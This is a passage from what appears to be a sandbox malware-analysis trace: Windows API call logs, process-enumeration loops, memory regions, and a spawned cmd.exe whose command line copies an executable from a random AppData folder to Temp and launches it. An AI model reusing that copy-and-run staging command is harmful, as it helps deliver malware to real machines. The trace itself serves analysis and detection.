0xc4 [0169.675] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.945] CloseHandle (hObject=0xc4) returned 1 [0169.945] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0169.955] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.004] CloseHandle (hObject=0xbc) returned 1 [0172.004] Sleep (dwMilliseconds=0x12c) [0172.492] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0172.498] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.698] CloseHandle (hObject=0xc4) returned 1 [0172.698] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0172.703] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.800] CloseHandle (hObject=0xbc) returned 1 [0172.800] Sleep (dwMilliseconds=0x12c) [0173.152] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0173.157] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.308] CloseHandle (hObject=0xc4) returned 1 [0173.308] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0173.314] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.432] CloseHandle (hObject=0xbc) returned 1 [0173.432] Sleep (dwMilliseconds=0x12c) [0173.861] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0173.865] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.040] CloseHandle (hObject=0xc4) returned 1 [0174.040] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0174.045] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.149] CloseHandle (hObject=0xbc) returned 1 [0174.149] Sleep (dwMilliseconds=0x12c) [0174.511] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0174.516] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.641] CloseHandle (hObject=0xc4) returned 1 [0174.641] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0174.646] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.717] CloseHandle (hObject=0xbc) returned 1 [0174.717] Sleep (dwMilliseconds=0x12c) [0175.072] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0175.078] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.168] CloseHandle (hObject=0xc4) returned 1 [0175.168] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0175.173] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.329] CloseHandle (hObject=0xbc) returned 1 [0175.329] Sleep (dwMilliseconds=0x12c) [0175.634] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0175.640] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.680] CloseHandle (hObject=0xc4) returned 1 [0175.680] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0175.685] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.724] CloseHandle (hObject=0xbc) returned 1 [0175.724] Sleep (dwMilliseconds=0x12c) [0176.024] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0176.029] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.103] CloseHandle (hObject=0xc4) returned 1 [0176.103] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0176.109] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.157] CloseHandle (hObject=0xbc) returned 1 [0176.158] Sleep (dwMilliseconds=0x12c) [0176.677] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0176.682] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.731] CloseHandle (hObject=0xc4) returned 1 [0176.732] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0176.737] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.785] CloseHandle (hObject=0xbc) returned 1 [0176.785] Sleep (dwMilliseconds=0x12c) [0177.140] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0177.146] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.195] CloseHandle (hObject=0xc4) returned 1 [0177.195] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0177.200] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.392] CloseHandle (hObject=0xbc) returned 1 [0177.392] Sleep (dwMilliseconds=0x12c) [0177.700] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0177.704] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.758] CloseHandle (hObject=0xc4) returned 1 [0177.758] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0177.762] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.806] CloseHandle (hObject=0xbc) returned 1 [0177.806] Sleep (dwMilliseconds=0x12c) [0178.237] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0178.243] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.289] CloseHandle (hObject=0xc4) returned 1 [0178.289] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0178.293] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.381] CloseHandle (hObject=0xbc) returned 1 [0178.381] Sleep (dwMilliseconds=0x12c) [0178.816] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0178.821] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 Process: id = "29" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16860" os_pid = "0xc70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4165 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4166 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4167 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4168 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 4169 start_va = 0x4aa20000 end_va = 0x4aa6bfff entry_point = 0x4aa20000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 4170 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4171 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4172 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4173 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 4174 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 4408 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4409 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4410 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4411 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 4412 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 4413 start_va = 0x6f8f0000 end_va = 0x6f8f6fff entry_point = 0x6f8f0000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 4414 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4415 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 4416 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4417 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4418 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4419 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 4420 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4421 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 4422 start_va = 0x450000 end_va = 0x517fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 4423 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4424 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4425 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 4426 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 4427 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 4428 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 4429 start_va = 0x520000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 4430 start_va = 0x630000 end_va = 0x122ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 4431 start_va = 0x1230000 end_va = 0x1392fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001230000" filename = "" Region: id = 4442 start_va = 0x13a0000 end_va = 0x166efff entry_point = 0x13a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 47 os_tid = 0xc74 [0107.039] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fbac | out: lpSystemTimeAsFileTime=0x26fbac*(dwLowDateTime=0x7dcd8a60, dwHighDateTime=0x1d440a9)) [0107.039] GetCurrentProcessId () returned 0xc70 [0107.039] GetCurrentThreadId () returned 0xc74 [0107.039] GetTickCount () returned 0x259b3 [0107.039] QueryPerformanceCounter (in: lpPerformanceCount=0x26fba4 | out: lpPerformanceCount=0x26fba4*=16382791821) returned 1 [0107.039] GetModuleHandleA (lpModuleName=0x0) returned 0x4aa20000 [0107.039] __set_app_type (_Type=0x1) [0107.039] __p__fmode () returned 0x76b331f4 [0107.039] __p__commode () returned 0x76b331fc [0107.039] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4aa421a6) returned 0x0 [0107.040] __getmainargs (in: _Argc=0x4aa44238, _Argv=0x4aa44240, _Env=0x4aa4423c, _DoWildCard=0, _StartInfo=0x4aa44140 | out: _Argc=0x4aa44238, _Argv=0x4aa44240, _Env=0x4aa4423c) returned 0 [0107.040] GetCurrentThreadId () returned 0xc74 [0107.040] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc74) returned 0x38 [0107.040] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0107.040] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0107.040] SetThreadUILanguage (LangId=0x0) returned 0x409 [0107.040] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0107.040] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fb3c | out: phkResult=0x26fb3c*=0x0) returned 0x2 [0107.040] VirtualQuery (in: lpAddress=0x26fb73, lpBuffer=0x26fb0c, dwLength=0x1c | out: lpBuffer=0x26fb0c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0107.040] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fb0c, dwLength=0x1c | out: lpBuffer=0x26fb0c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0107.040] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fb0c, dwLength=0x1c | out: lpBuffer=0x26fb0c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0107.040] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fb0c, dwLength=0x1c | out: lpBuffer=0x26fb0c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0107.040] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fb0c, dwLength=0x1c | out: lpBuffer=0x26fb0c*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xc0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0107.040] GetConsoleOutputCP () returned 0x1b5 [0107.040] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aa44260 | out: lpCPInfo=0x4aa44260) returned 1 [0107.040] SetConsoleCtrlHandler (HandlerRoutine=0x4aa3e72a, Add=1) returned 1 [0107.040] _get_osfhandle (_FileHandle=1) returned 0x7 [0107.040] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0107.041] _get_osfhandle (_FileHandle=1) returned 0x7 [0107.041] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4aa441ac | out: lpMode=0x4aa441ac) returned 1 [0107.041] _get_osfhandle (_FileHandle=1) returned 0x7 [0107.041] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0107.041] _get_osfhandle (_FileHandle=0) returned 0x3 [0107.041] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4aa441b0 | out: lpMode=0x4aa441b0) returned 1 [0107.041] _get_osfhandle (_FileHandle=0) returned 0x3 [0107.041] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0107.041] GetEnvironmentStringsW () returned 0x3603a0* [0107.041] FreeEnvironmentStringsW (penv=0x3603a0) returned 1 [0107.042] GetEnvironmentStringsW () returned 0x3603a0* [0107.042] FreeEnvironmentStringsW (penv=0x3603a0) returned 1 [0107.042] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26eaac | out: phkResult=0x26eaac*=0x40) returned 0x0 [0107.042] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x0, lpData=0x26eab8*=0x50, lpcbData=0x26eab0*=0x1000) returned 0x2 [0107.042] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x1, lpcbData=0x26eab0*=0x4) returned 0x0 [0107.042] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x0, lpData=0x26eab8*=0x1, lpcbData=0x26eab0*=0x1000) returned 0x2 [0107.042] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x0, lpcbData=0x26eab0*=0x4) returned 0x0 [0107.042] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x40, lpcbData=0x26eab0*=0x4) returned 0x0 [0107.042] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x40, lpcbData=0x26eab0*=0x4) returned 0x0 [0107.042] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x0, lpData=0x26eab8*=0x40, lpcbData=0x26eab0*=0x1000) returned 0x2 [0107.042] RegCloseKey (hKey=0x40) returned 0x0 [0107.042] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26eaac | out: phkResult=0x26eaac*=0x40) returned 0x0 [0107.042] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x0, lpData=0x26eab8*=0x40, lpcbData=0x26eab0*=0x1000) returned 0x2 [0107.042] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x1, lpcbData=0x26eab0*=0x4) returned 0x0 [0107.042] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x0, lpData=0x26eab8*=0x1, lpcbData=0x26eab0*=0x1000) returned 0x2 [0107.042] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x0, lpcbData=0x26eab0*=0x4) returned 0x0 [0107.042] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x9, lpcbData=0x26eab0*=0x4) returned 0x0 [0107.042] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: 